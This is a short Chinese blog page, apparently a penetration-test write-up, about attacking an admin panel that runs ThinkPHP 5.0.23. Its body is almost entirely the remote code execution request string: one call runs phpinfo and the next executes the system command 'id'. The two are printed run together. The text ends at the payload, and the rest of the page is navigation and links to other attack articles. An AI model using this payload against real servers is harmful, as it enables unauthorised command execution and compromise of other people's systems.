文章详情
一次艰难的TP渗透测试
日期:2020/11/6 6:00:35
信息收集
由于网站 www.a.com/admin,访问立即跳转到www.a.com/admin/publicer/login
发现是TP,5.0.23,在漏洞的版本范围内,尝试使用:
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
上一文章:WebLogic-XMLDecoder反序列化漏洞分析
下一文章:XSS实战攻击思路总结
相关推荐
- 11-10从蜜罐上线到1day发现
- 05-19通过参数污染触发XSS
- 11-23监听445端口抓v2数据
- 10-26Node.jsVuln
- 05-18HowDidIFindWeblogicT3RCE(CVE-2020-14756)
- 05-18Xmind2020XSS漏洞导致命令执行复现
- 10-20我靠seo赚到的几百万收入
- 10-30【实战】无回显Rce到Getshell
- 11-04摩拜单车和QQ合作 7天免押金 送免费骑行月卡
- 10-01联通用户撸摩拜90天卡+免押金
- 10-29AKSK命令执行到谷歌验证码劫持
- 09-08《王者荣耀》各地玩家平均段位出炉:来看看你
- 10-21shiro权限绕过实战利用
- 10-21探索Mimikatz-第2部分-SSP